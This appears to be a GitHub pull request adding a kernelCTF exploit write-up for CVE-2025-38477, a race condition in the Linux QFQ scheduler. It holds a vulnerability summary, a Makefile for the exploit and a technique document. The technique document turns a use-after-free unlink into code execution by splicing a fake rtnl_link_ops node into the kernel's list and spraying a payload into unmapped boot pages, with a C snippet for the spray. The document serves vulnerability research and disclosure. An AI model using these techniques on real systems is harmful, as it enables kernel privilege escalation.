Open
35 commits
bd34894
Add kernelCTF CVE-2025-38477_cos
n132 Oct 21, 2025
a4829bf
Add deps for CVE-2025-38477: libx
n132 Oct 21, 2025
6e800d4
CVE-2025-38477: Update metadata
n132 Oct 21, 2025
4b31a65
CVE-2025-38477: Update metadata
n132 Oct 21, 2025
b965621
Add CVE-2025-38477_cos: Solve the dep issue
n132 Oct 21, 2025
e5ac2ae
Add CVE-2025-38477_cos: debug mode
n132 Oct 21, 2025
5fac98f
resubmit: retry the checks
n132 Oct 21, 2025
40a22a8
Update exploit.md
n132 Oct 22, 2025
57d112a
CI: Fix the timeout issue
n132 Oct 22, 2025
66ac3e2
Merge branch 'master' of https://github.com/n132/security-research
n132 Oct 22, 2025
7be891b
CI: Fix the timeout issue
n132 Oct 22, 2025
0fcb6a2
CI: Fix the timeout issue
n132 Oct 22, 2025
bbffd62
CI: Fix the timeout issue
n132 Oct 22, 2025
36c3d66
CI: Retest
n132 Oct 23, 2025
4ec38ce
More trial
n132 Oct 23, 2025
2a320ac
Update exploit.md
n132 Oct 23, 2025
f479e67
Update exploit.md with vulnerability details
n132 Oct 23, 2025
30e37be
CI: Retest
n132 Oct 23, 2025
97468cf
CI Reset & document format
WinMin Oct 28, 2025
467777b
Merge branch 'master' of https://github.com/n132/security-research
n132 Oct 28, 2025
7e35086
reset
n132 Oct 28, 2025
dfc301f
Update with correct kaslr leak
n132 Oct 28, 2025
5853450
Update with correct kaslr leak
n132 Oct 28, 2025
5431878
Make it debugable
n132 Oct 28, 2025
abe30f0
[v8ctf] Update v8CTF challenges
sroettger Oct 29, 2025
d17719b
fix: kaslr leaking
n132 Oct 29, 2025
a692b05
Merge branch 'google:master' into master
n132 Oct 29, 2025
bfb8a02
retry
n132 Oct 29, 2025
be58c7f
code for test
n132 Oct 29, 2025
2abb594
code for test
n132 Oct 29, 2025
bf5b241
code for test
n132 Oct 29, 2025
25ca9e8
code for test
n132 Oct 29, 2025
29ce9d7
retest
n132 Oct 29, 2025
929630c
retest
n132 Oct 29, 2025
6350546
[v8ctf] Update v8CTF challenges
sroettger Dec 3, 2025
1,084 changes: 1,084 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-38477_cos/docs/exploit.md

Large diffs are not rendered by default.

265 changes: 265 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-38477_cos/docs/novel-techniques.md
@@ -0,0 +1,265 @@
From UAF-Unlink to ACE: LL_ATK and NPerm
===============

By combining race-condition techniques from the academic literature, we reliably
hit the bug and obtain a use-after-free (UAF) on `struct qfq_aggregate`, which
is allocated from the kmalloc-128 cache:

```c
struct qfq_aggregate {
struct hlist_node next; /* 0 0x10 */
u64 S; /* 0x10 0x8 */
u64 F; /* 0x18 0x8 */
struct qfq_group * grp; /* 0x20 0x8 */
u32 class_weight; /* 0x28 0x4 */
int lmax; /* 0x2c 0x4 */
u32 inv_w; /* 0x30 0x4 */
u32 budgetmax; /* 0x34 0x4 */
u32 initial_budget; /* 0x38 0x4 */
u32 budget; /* 0x3c 0x4 */
/* --- cacheline 1 boundary (64 bytes) --- */
int num_classes; /* 0x40 0x4 */

/* XXX 4 bytes hole, try to pack */

struct list_head active; /* 0x48 0x10 */
struct hlist_node nonfull_next; /* 0x58 0x10 */

/* size: 104, cachelines: 2, members: 13 */
/* sum members: 100, holes: 1, sum holes: 4 */
/* last cacheline: 40 bytes */
};
```

With an agg pointer referencing a freed object, classic strategies include
same-cache refill (kmalloc-128) or cross-cache exploitation. Both are too heavy
when the race takes several thousand attempts and a win can only be confirmed
after building a UAF-read (e.g., by refilling with a readable struct). To win
KernelCTF, we designed a much lighter path that starts from a UAF-free with an
unlink and requires only a KASLR base leak to reach arbitrary code execution.
It combines two novel techniques: `LL_ATK` and `NPerm`.

## UAF-Unlink

Given an agg pointer to a freed-and-refilled object, we can free the refilled
object and trigger the unlink in `qfq_destroy_agg`:


```c
static void qfq_destroy_agg(struct qfq_sched *q, struct qfq_aggregate *agg)
{
	hlist_del_init(&agg->nonfull_next);
	q->wsum -= agg->class_weight;
	if (q->wsum != 0)
		q->iwsum = ONE_FP / q->wsum;

	if (q->in_serv_agg == agg)
		q->in_serv_agg = qfq_choose_next_agg(q);
	kfree(agg);
}
```

The unlink action (`hlist_del_init(&agg->nonfull_next)`) provides an
arbitrary-address unlink primitive:

```c
static inline void __hlist_del(struct hlist_node *n)
{
	struct hlist_node *next = n->next;
	struct hlist_node **pprev = n->pprev;

	WRITE_ONCE(*pprev, next);
	if (next)
		WRITE_ONCE(next->pprev, pprev);
}
```

Arbitrary-address unlink is uncommon in kernel exploits, but we show that it is
sufficient for arbitrary code execution (ACE) when paired with our techniques.

An arbitrary-address unlink on a kernel heap object (the agg object for
CVE-2025-38477) means we can trigger the unlink operation (e.g.,
`hlist_del_init`) and control its argument (e.g., `agg->nonfull_next`). With a
UAF, this is straightforward:

- Use the UAF to keep a pointer to a freed kernel heap object
- Refill the object with payload data (e.g., set `qfq_aggregate->nonfull_next`)
- Free the object through the dangling pointer (UAF-free) to trigger the unlink
- The unlink writes 8 bytes to an arbitrary address


So an arbitrary-address unlink gives us an 8-byte arbitrary write. It is not
arbitrary-length and might seem weak, and we might still need a heap leak
primitive.

In the following three sections we combine two novel techniques to gain ACE from
an arbitrary UAF-unlink without any additional address leak. There are two key
questions:
- Where to write (solved by `LL_ATK`)
- What to write (solved by `NPerm`)

## UAF Unlink Attack Targeting Linked Lists: LL_ATK


Idea. While reproducing CVE-2023-4623, I designed `LL_ATK` to solve the “where
to write” problem in UAF-unlink exploits. The key is to treat the
arbitrary-address unlink as a way to link an attacker-controlled (refilled) fake
node into any existing linked list. Once the address of a crafted fake node has
been written into a valid list, legitimate code later iterates that list and
invokes function pointers embedded in our fake node, which achieves code
execution.


Example. In our exploit, we splice a fake node into the kernel’s `rtnl_link_ops`
list. If the fake node’s `kind` (name) field and layout are set properly, the
kernel's traversal of `rtnl_link_ops` reaches our node and calls its function
pointers. Crucially, this path does not require a heap address leak.

```c
struct rtnl_link_ops {
struct list_head list; /* 0 0x10 */
const char * kind; /* 0x10 0x8 */
size_t priv_size; /* 0x18 0x8 */
struct net_device * (*alloc)(struct nlattr * *, const char *, unsigned char, unsigned int, unsigned int); /* 0x20 0x8 */
void (*setup)(struct net_device *); /* 0x28 0x8 */
bool netns_refund; /* 0x30 0x1 */

/* XXX 3 bytes hole, try to pack */

unsigned int maxtype; /* 0x34 0x4 */
const struct nla_policy * policy; /* 0x38 0x8 */
/* --- cacheline 1 boundary (64 bytes) --- */
int (*validate)(struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /* 0x40 0x8 */
int (*newlink)(struct net *, struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /* 0x48 0x8 */
int (*changelink)(struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /* 0x50 0x8 */
void (*dellink)(struct net_device *, struct list_head *); /* 0x58 0x8 */
size_t (*get_size)(const struct net_device *); /* 0x60 0x8 */
int (*fill_info)(struct sk_buff *, const struct net_device *); /* 0x68 0x8 */
size_t (*get_xstats_size)(const struct net_device *); /* 0x70 0x8 */
int (*fill_xstats)(struct sk_buff *, const struct net_device *); /* 0x78 0x8 */
/* --- cacheline 2 boundary (128 bytes) --- */
unsigned int (*get_num_tx_queues)(void); /* 0x80 0x8 */
unsigned int (*get_num_rx_queues)(void); /* 0x88 0x8 */
unsigned int slave_maxtype; /* 0x90 0x4 */

/* XXX 4 bytes hole, try to pack */

const struct nla_policy * slave_policy; /* 0x98 0x8 */
int (*slave_changelink)(struct net_device *, struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /* 0xa0 0x8 */
size_t (*get_slave_size)(const struct net_device *, const struct net_device *); /* 0xa8 0x8 */
int (*fill_slave_info)(struct sk_buff *, const struct net_device *, const struct net_device *); /* 0xb0 0x8 */
struct net * (*get_link_net)(const struct net_device *); /* 0xb8 0x8 */
/* --- cacheline 3 boundary (192 bytes) --- */
size_t (*get_linkxstats_size)(const struct net_device *, int); /* 0xc0 0x8 */
int (*fill_linkxstats)(struct sk_buff *, const struct net_device *, int *, int); /* 0xc8 0x8 */

/* size: 208, cachelines: 4, members: 26 */
/* sum members: 201, holes: 2, sum holes: 7 */
/* last cacheline: 16 bytes */
};
```

`rtnl_link_ops` holds the callback table for each rtnetlink “link type” (e.g.,
ipvlan). When userspace asks the kernel to create, modify, or delete an
rtnetlink device (via `RTM_NEWLINK`, `RTM_DELLINK`, etc.), the kernel scans the
global linked list of registered `rtnl_link_ops` and selects the entry whose
`kind` matches the user-provided type (e.g., "ipvlan"). If a UAF-unlink
primitive lets us splice a forged `rtnl_link_ops` node into that list (with a
correctly targeted `kind`), subsequent rtnetlink operations dispatch into
attacker-controlled function pointers, turning the UAF-unlink into arbitrary
code execution.


`LL_ATK` is not limited to `rtnl_link_ops`; it is a general strategy for using
a UAF-unlink. It is an exploitation technique that transforms a UAF-unlink into
fake-node insertion and then arbitrary code execution. Because linked lists are
used so widely in the kernel, it applies to many UAFs and makes them easier to
exploit (e.g., CVE-2023-4623, where I first designed it). It solves the “where
to write” problem.

## Leave Payload next to Kernel Resource: `NPerm`

> Note: This is not an exploitable bug per se; we have reported it to the kernel
> hardening team, and a patch discussion is ongoing.

In the `LL_ATK` setting, “what to write” is really “where to place the fake
node.” As mentioned in the previous section, `LL_ATK` does not require a heap
leak, only a KASLR (kernel base) leak, which is currently not hard to obtain
with a prefetch side-channel attack. `NPerm` solves the remaining problem:
placing our payload at an address derived from the kernel base, so that no
additional leak is needed.


`NPerm` exploits a long-standing (decades-old) kernel design issue. We (@n132
and @kyle) identified it in Spring 2025 and reported it to the kernel security
team. Some maintainers did not consider it a security vulnerability and
suggested submitting a hardening patch instead. That patch has not yet landed,
so the issue remains exploitable (e.g., in KernelCTF). We also noticed that
@XuaizaYa independently described the same behavior in a [recent
write-up][5], without pinpointing the root cause.

> From our original email to kernel security team:
> I am writing to bring to your attention some security vulnerabilities
> I have discovered. These vulnerabilities allow users to allocate pages
> mapped to kernel image areas, which would make kernel exploitation
> easier, considering side-channel attacks.
>
> There are mainly 4 regions not removed from kernel image mapping after free:
> - [rodata_resource.end, data_resource.start]
> - [__init_begin, __init_end]
> - [__smp_locks, __smp_locks_end]
> - [_brk_end, hpage_align(__end_of_kernel_reserve)]
> User space processes can use mmap to get pages in these areas and
> leave their ROP chain on these pages so they can pivot the stack to
> these areas with leaked kernel text base (via side-channel attacks).

The root cause of `NPerm` is that the kernel frees some pages used during the
early boot stage but does not unmap them from the kernel resource areas.
Therefore, if we get these pages back from the page allocator, we can still
reach them through their mapped addresses in the kernel resource areas.


It is easy to use, as shown in our exploit:
```c
#define PAYLOAD_SPRAY_PAGES 0x10
#define PAGE_SIZE 0x1000
#define TOTAL_ALLOCATION (PAGE_SIZE * PAYLOAD_SPRAY_PAGES)

void nperm(){
    // Drain memory to increase chance of getting pages from the target regions.
    pgvAdd(1, 9, 0x610);
    for(int i = 0; i < PAYLOAD_SPRAY_PAGES; i++){
        // PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS
        void* addr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if(addr == MAP_FAILED)
            break;
        memcpy(addr, payload, sizeof(payload)); // Spray payload
    }
    pgvDel(1); // Release the memory
}
```

We use a `pgv` allocation (not necessary, but it makes the process faster) to
drain memory and then spray our payload with `mmap`. The payload can then be
found in the following four regions:

- [rodata_resource.end, data_resource.start]
- [__init_begin, __init_end]
- [__smp_locks, __smp_locks_end]
- [_brk_end, hpage_align(__end_of_kernel_reserve)]


`NPerm` lets us place our payload at a known address with only a KASLR
(kernel base) leak, which solves the “what to write” problem.


## LL_ATK × NPerm: From UAF-Unlink to Code Execution


Combining `LL_ATK` and `NPerm` dramatically simplifies exploitation. In our
case, once we had a `UAF-Unlink` primitive, the final exploit core (sans
comments) fit in ~16 lines. The two techniques are independent and reusable:
`LL_ATK` inserts a fake node into a targeted kernel list; `NPerm` lands the fake
node in a kernel resource area, so we don't need an additional kernel heap leak.

Summary: Together, `LL_ATK` + `NPerm` form a generic, practical pathway to
transform a UAF-Unlink into reliable arbitrary code execution.


[5]: https://blog.xmcve.com/2025/09/22/WMCTF2025-Writeup/#title-5
32 changes: 32 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-38477_cos/docs/vulnerability.md
@@ -0,0 +1,32 @@
# Vulnerability

CVE-2025-38477 is a race condition vulnerability in the QFQ packet scheduler of
the Linux kernel.

It occurs when `agg` is modified in `qfq_change_agg` (called during
`qfq_enqueue`) while other threads access it concurrently. Racing it against
different functions yields different primitives. For example, `qfq_dump_class`
may trigger a NULL dereference, and `qfq_delete_class` may cause a
use-after-free.

Easy-to-trigger PoC: https://lore.kernel.org/all/aGIAbGB1VAX-M8LQ@xps/

## Requirements
- **Capabilities**: `CAP_NET_ADMIN` is required.
- **Kernel configuration**: `CONFIG_NET_SCHED` and `CONFIG_NET_SCH_QFQ` must be enabled.
- **User namespaces**: Required to obtain `CAP_NET_ADMIN` if not already available to the user.

## Introduction
- **Commit**: [462dbc9101ac](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=462dbc9101ac)
- **Description**: This commit introduced the "Quick Fair Queueing Plus Scheduler" (QFQ+) to the kernel in Linux 3.0-rc1.

## Fix
- **Commit**: [5e28d5a3f774](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5e28d5a3f774)

## Affected Versions
- Linux 3.0-rc1 to 6.16-rc6

## Subsystem
- Net scheduler

## Root Cause
- Race condition
@@ -0,0 +1,54 @@
# Makefile for CVE-2025-38477 exploit

CC = gcc
CFLAGS = -static -w
DBGFLAGS = -g
TARGET = exploit
SOURCE = exploit.c

# libx configuration - expects libx to be in ./libx directory
LIBX_DIR = ./libx
LIBX_LIB = $(LIBX_DIR)/libx.a
LIBX_INCLUDE = $(LIBX_DIR)

# Directly link the local static library to avoid conflicts with system libx
INCLUDES = -I$(LIBX_INCLUDE)

.PHONY: all clean check-libx libx

all: $(LIBX_LIB) $(TARGET)

# Check if libx directory exists
check-libx:
	@if [ ! -d "$(LIBX_DIR)" ]; then \
		echo "Error: libx directory not found at $(LIBX_DIR)!"; \
		echo "Please ensure libx is present in the current directory"; \
		exit 1; \
	fi

# Build libx from local source
$(LIBX_LIB): check-libx
	@echo "Building libx..."
	@$(MAKE) -C $(LIBX_DIR)
	@echo "libx is ready!"

# Convenience target to just build libx
libx: $(LIBX_LIB)

$(TARGET): $(SOURCE) $(LIBX_LIB)
	$(CC) $(CFLAGS) $(INCLUDES) $(SOURCE) -o $(TARGET) $(LIBX_LIB)


# Debug build expected by CI workflow
.PHONY: exploit_debug
exploit_debug: $(SOURCE) $(LIBX_LIB)
	$(CC) $(filter-out -s,$(CFLAGS)) $(DBGFLAGS) $(INCLUDES) \
		$(SOURCE) -o exploit_debug $(LIBX_LIB)

clean:
	rm -f $(TARGET)
	rm -f exploit_debug
	@if [ -d "$(LIBX_DIR)" ]; then \
		echo "Cleaning libx..."; \
		$(MAKE) -C $(LIBX_DIR) clean 2>/dev/null || true; \
	fi
Binary file not shown.